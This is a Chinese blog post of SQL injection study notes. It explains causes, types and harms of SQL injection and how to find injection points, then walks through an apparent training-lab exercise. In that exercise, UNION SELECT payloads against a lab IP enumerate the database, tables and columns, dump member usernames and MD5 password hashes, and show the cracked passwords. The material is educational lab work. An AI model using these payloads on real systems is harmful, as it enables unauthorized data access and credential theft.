WEB漏洞——SQL注入之简要SQL注入

最新推荐文章于 2024-07-22 20:49:27 发布
最新推荐文章于 2024-07-22 20:49:27 发布
阅读量3k 收藏 4
点赞数 1
分类专栏: 网安学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52589245/article/details/120624310
版权

SQL注入 数据库安全 信息泄露 UNION SELECT 参数化查询
关键词由CSDN通过智能技术生成

前言

        sql注入是比较常见的网络攻击方式之一, 他不是利用操作系统的bug来实现攻击,而是针对程序员编写时的疏忽,通过sql语句,实现无账号登录,甚至篡改数据库。

 sql简介

        sql是一门ANSI的标准计算机语言, 用来访问和操作书序库系统。 sql语句用于取回和更新数据库中的数据。sql可与数据库程序协同工作,比如MS Access, DB2 , informinx, mssql Server,Oracle, Sybase 以及其他数据库系统。

sql注入

        sql注入就是一种通过操作输入来修改后台sql语句达到代码执行进行攻击的目的的技术。

sql注入产生原理

1.对用户输入的参数没有进行严格过滤(如过滤单双引号 尖括号等), 就被带到数据库执行,造成了sql注入

2.使用了字符串拼接的方式造成sql语句

sql注入的分类

1.从注入手法分类可以分为:联合查询注入、报错型注入、布尔型注入、延时注入、堆叠注入

2.从数据类型上可以分为:字符型(即输入的输入使用符号进行过滤)、数值型(即输入的输入未使用符号进行过滤)

3.从注入位置可以分类为:GET数据(提交数据方式为GET,大多存在地址栏)、POST数据(提交数据方式为POST,大多存在输入框中)、HTTP头部(提交数据方式为HTTP头部)、cookie数据(提交数据方式为cookie)

SQL注入的危害

分为两类:危害数据库里的数据、直接危害到网站的权限(需要满足条件)

1.数据库信息泄露

2.网页篡改:登录后台发布恶意内容

3.网页挂马;当拿到webshell时或者获取到服务器权限后,可将一些网页木马挂在服务器上去攻击别人

4.私自添加系统账号

5.读写文件获取webshell

MYSQL数据库

        数据库A=网站A=数据库用户A

                表名

                        列名

                                数据

数据库B=网站B=数据库用户B

。。。。。。。。

数据库C=网站C=数据库用户C

。。。。。。。。

必要知识

1.在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。

2.数据库中符号“.”代表下一级 ,如xiaodi.user表示xiaodi数据库下的user表名

3.常用参数

        information_schema.tables:记录所有表明信息的表

        information_schema.columns:记录所有列名信息的表

        table_name:表明

        column_name:列名

        table_schema:数据库名

        user()查看当前MySQL登录的用户名

        database()查看当前使用MySQL数据库名

        version()查看当前MySQL版本

如何判断注入点

  1. 如果页面中MySQL报错,证明该页面中存在SQL注入漏洞

单引号 '

and 1=1

and 1=2

SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 正常

SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 错误

       2.逻辑运算符(或与非)

真 且 真 = 真

真 且 假 = 假

真 或 假 = 真

SELECT * FROM users WHERE id=1 真

1=1 真

1=2 假

真且真=真

真且假=假

SELECT * FROM users WHERE id=1 or 1=1 LIMIT 0,1 正常

SELECT * FROM users WHERE id=1 or 1=2 LIMIT 0,1 正常

SQL注入利用

  1. 根据注入位置数据类型将sql注入分类
  2. 利用order判断字段数

order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错

?id=1' order by 3--+

      3.利用 union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数

?id=-1 union select 1,2,3 --+

        4.利用函数database(),user(),version()可以得到所探测数据库的数据库名、用户名和版本号

?id=-1 union select 1,database(),version() --+

        5.利用 union select 联合查询,获取表名    

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='已知库名'--+

        6.利用 union select 联合查询,获取字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='已知表名'--+

        7.利用 union select 联合查询,获取字段值

?id=-1' union select 1,2,group_concat(已知字段名,':'已知字段名) from 已知表名--+

        题目

  1. 可能存在注入的编号选项有哪几个?

                www.xiaodi8.com/index.php?id=8

                www.xiaodi8.com/?id=10

                www.xiaodi8.com/?id=10&x=1

                www.xiaodi8.com/index.php(post注入)

        2.参数有x注入,以下哪个注入测试正确

                A.www.xiaodi8.com/new/php?y=1 and 1=1&x=2

                B.www.xiaodi8.com/new/php?y=1&x=2 and 1=1

                C.www.xiaodi8.com/new/php?y=1 and 1=1 & x=2 and 1=1

                D.www.xiaodi8.com/new/php?xx=1 and 1=1&xxx=2 and 1=1

        3.如果参数id存在注入点

                参数的位置可以互换,使用工具的时候要注意

                http://www/cnhgs.net/main.php?id53(注入点) and 1=2 &page=1

                -> http://www/cnhgs.net/main.php?page=1&id53(注入点) and 1=2

测试演示

要选用最舒服的方法测试:

SELECT * FROM users WHERE id=1asdsadsad(随便输入) LIMIT 0,1

随便输入后对网页有影响说明带入数据库进行查询有注入点,没有影响说明没有带入数据库查询,出现404错误说明对输入检测   没有漏洞

#猜解列名数量(字段数)

order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错

http://219.153.49.228:43230/new_list.php?id=1 order by 4

#报错猜解准备

http://219.153.49.228:43230/new_list.php?id=1 union select 1,2,3,4

http://219.153.49.228:43230/new_list.php?id=-1%20union%20%20select%201,2,3,4

​​​​​​​​​​​http://219.153.49.228:43230/new_list.php?id=1%20and%201=22222%20union%20%20select%201,2,3,4​​​​​​​x​​​​​​​ 

信息收集

数据库版本:version() 5.7.22-0ubuntu0.16.04.1

数据库名字:database() mozhe_Discuz_StormGroup

数据库用户:user() root@localhost

操作系统:@@version_compile_os Linux

http://219.153.49.228:43230/new_list.php?id=-1%20union%20select%201,database(),version(),4

http://219.153.49.228:43230/new_list.php?id=-1%20union%20select%201,user(),@@version_compile_os,4

#查询指定数据库名mozhe_Discuz_StormGroup下的表名信息:

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询所有:

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

#查询指定表名StormGroup_member下的列名信息

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

id,name,password,status

#查询指定数据

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member

#猜解多个数据可以采用limit x,1 变动猜解

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1

mozhe

356f589a7df439f6f744ff19bb8092c0 MD5解密 dsan13

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1

mozhe

a26f03bdd67bc4a815c2c30c6daf0ce3 MD5解密 959003

 

小兔子乖乖把门开开zm
关注
专栏目录
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1261
简单的SQL注入
web安全:SQL注入
冰糖葫芦
11-02 219
SQL注入是网站和web应用程序中最常见的安全漏洞。这种恶意技术有很多应用场景, 但(SQL注入)通常是指在数据输入的地方注入代码以利用数据库应用程序中的安全漏洞SQL注入在接收用户输入的接口处 (也就是说在注册表单、查询表单等地方)尝试执行注入操作。对(SQL注入)高度关注以及方便检测数据库应用程序中的安全漏洞使得攻击者经常地以最小的努力“测试”网站/应用程序的安全完整性。 危害 成...
【墨者学院】“SQL手工注入漏洞测试(Db2数据库)”详细通关
最新发布
m0_54407057的博客
07-22 380
利用md5进行解密密码(MD5免费在线解密破解_MD5在线加密-SOMD5利用得到的用户名和密码尝试登录解题结束!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1。
WEB新手之sql注入
weixin_33901843的博客
03-22 108
  继续写题。   这题看上去是一道sql注入题。F12查看后台代码。   可以看到后台有两个变量,分别是uname以及passwd。然后接下来读一下后台的代码,这里的意思是,如果用户输入的密码经过md5加密后,和通过select语句选出来的password相等,则输出“login success”,否则输出“login fail”。利用这里md5()条件语句,我们可以对后台的sql语...
WEB-SQL注入
yufengly1984的专栏
07-29 216
1.
WEB安全-SQL注入
weixin_56319791的博客
09-16 1955
SQL注入漏洞
【小迪安全day12】WEB 漏洞——SQL 注入
RichUee的博客
12-04 917
WEB 漏洞-SQL 注入在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。
【小迪安全day11】WEB漏洞——必懂知识点
RichUee的博客
12-03 884
讲解各种WEB层面上的有哪些漏洞类型,具体漏洞的危害等级,以及简要的影响范围测试进行实例分析,思维导图中的漏洞也是我们将要学习到的各个知识点,其实针对漏洞的形成原理,如何发现,如何利用。右侧的漏洞是重点: CTF,SRC,红蓝对抗,实战等。每个漏洞的危害情况都是不同的,得到的东西也不同,影响范围也不一样; 例如:SQL注入直接获取到关于网站对应数据库里面的权限,将会影响到网站和服务器数据库,获得权限;高危漏洞SQL注入、文件上传、文件包含、代码执行、未授权访问、命令执行(直接影响到网站权限,获得数据或者网
oracle 注入靶场,pick靶场-sql注入
weixin_31448735的博客
04-16 757
甲.数字型注入数字型注入一般提交值没有引号,所以直接在后面构造语句就可以了。抓包查看构造语句提交后该数据库表内容被爆出来了。乙.字符型注入首先我们要知道一点,字符串在数据库中提交是需要用引号将字符串包含的。所以字符型注入一般需要用到引号来闭合字符串,闭合引号后就可以接执行的sql语句,就可以执行。name='kobe'这时候需要构造语句 'or 1=1# 单引号是为了闭合1前面的单引号,#是为了...
Web安全性测试—SQL注入
hualusiyu的专栏
03-10 4089
Web安全性测试—SQL注入 因为要对网站安全性进行测试,所以,学习了一些sql注入的知识。   在网上看一些sql注入的东东,于是想到了对网站的输入框进行一些测试,本来是想在输入框中输入alter("abc"),但是输入框有字符限制,只好输入,结果网站出大问题了,呵呵,终于又出现了个bug。   另一个就是在URL最后随意输入一些字符或数字,结果,新闻模块那出现了问题,暴露了网站的一些信息
【网络安全 | 1.5w字总结】SSTI漏洞入门
等风来
08-24 8954
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
DB2数据库SQL注入语句
02-17
可以试试学习一下,不可以滥用, 猜用户表数量: and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)
Web安全之SQL注入
qq_42751192的博客
06-09 2300
SQL注入SQL lnjection)是发生在 Web 程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至修改数据库。也就是说,SQL 注入就是在用户输入的字符串中添加 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
Web漏洞SQL注入
weixin_51614272的博客
05-08 2356
目录SQL语句什么是sql注入sql注入的原理有关sql注入产生的条件SQL查询语句selectWHERE :SQL常用聚合函数:union、limit其他 SQL语句 什么是sql注入? 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵,对于sql注入可以把它归为一句话:所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中,然后传递到sql服务器
web-sql注入
h1825819493的博客
07-12 240
前端的一个可控变量让我们可以自己构造数据库语句去非法访问后端的数据库.
web SQL注入
weixin_30894389的博客
05-19 79
注入类型 1.数字注入 ?id=12 or 1=1 结果:查询出了数据库所有数据 2.字符注入 用户名后加上 '# 或者 '-- ,生成的查询语句从密码后其实是被注释了,所以绕过了密码验证 预防方法 1. is_number()进行类型判断,或者 intval()进行强制类型转换 ...
电子商务网站SQL注入项目实战一例
weixin_33961829的博客
07-23 152
故事A段:发现整站SQL对外输出:   有个朋友的网站,由于是外包项目,深圳某公司开发的,某天我帮他检测了一下网站相关情况。 我查看了页面源代码,发现了个惊人的事情,竟然整站打印SQL到Html里,着实吓我一跳: PS:2年前秋色园系列文章有分享一文是整站SQL打印用于分析网站性能,不过也只是本地优化调试,而服务器上也采用某特殊条件才打印。 于是把这赤祼祼的对外公开的SQL问题反映了过去...
web安全之sql注入
weixin_54584489的博客
02-21 620
本文主要为sql注入学习,对sql注入进行整体自我学习概括
web安全-SQL注入
qq_41103091的博客
03-22 447
注入又分为:sql注入、xml注入、代码注入 sql注入例如mybatis使用#{}避免sql注入,xml注入使用excape或其他编码方式防止注入,代码注入例如提交一段js代码后台应用程序执行此JS代码,对抗代码注入,需要禁止使用eval()等可以执行命令的函数 DDOS攻击 常见的DDOS攻击有SYN flood、UDP flood、ICMP flood等,因此TCP设计缺陷攻击者能一直发送第一次握手信息(SYN = 1 ,Seq = x) Syn_Flood防御方式 cookie源认证: 原理是syn
深入理解Web安全:SQL注入攻击详解
"Web安全之SQL注入攻击" 在Web安全领域,SQL注入攻击是一种常见的威胁,它发生在应用程序未能正确地过滤或转义用户输入,导致恶意SQL代码被执行时。本晨讲将深入探讨这一主题,分为理论讲解、实战演练和扩展内容三...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值